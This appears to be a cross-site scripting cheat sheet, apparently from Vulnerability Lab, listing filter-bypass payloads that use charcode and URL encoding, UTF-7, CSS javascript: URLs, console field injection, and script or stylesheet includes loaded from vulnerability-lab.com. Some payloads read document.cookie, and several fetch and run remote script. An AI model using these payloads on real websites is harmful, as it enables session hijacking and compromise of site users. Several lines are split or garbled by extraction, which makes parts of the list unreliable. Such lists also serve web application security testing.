1337
">
1337+1
Cross Site Scripting Strings Restriction Bypass Obfuscation
>“ALeRt("VlAb")
>"
Cross Site Scripting Strings Restriction Bypass String to Charcode
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//-->">'>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))
'';!--"=&{()}
Cross Site Scripting Strings Restriction Bypass encoded frame url
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E
Cross Site Scripting Strings via Console:
set vlan name 1337 alert(document.cookie)
set system name
set system location ">set system contact alert('VL')
insert alert(document.cookie)
add
add user alert(document.cookie) alert(document.cookie)@gmail.com
add topic
add name alert('VL')
perl -e 'print "
)
";' > out
perl -e 'print "alert(\"CrossSiteScripting\")";' > out
Cross Site Scripting Strings on per line validation applications:
![]()
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"
>
Cross Site Scripting Strings Embed:
Cross Site Scripting Strings Action Script:
<alert("CrossSiteScripting");//<
<br><SCRIPT SRC=//vulnerability-lab.com/.js>
<br><SCRIPT>a=/CrossSiteScripting/ alert(a.source)
` SRC="http://vulnerability-lab.com/CrossSiteScripting.js">
document.write("<SCRI");PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js">
alert("CrossSiteScripting");
![]()
alert("CrossSiteScripting")">
![]()
+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';
@import'http://vulnerability-lab.com/CrossSiteScripting.css';
alert('CrossSiteScripting');
.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}
BODY{background:url("javascript:alert('CrossSiteScripting')")}
li {list-style-image: url("javascript:alert('CrossSiteScripting')");}
- CrossSiteScripting
BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}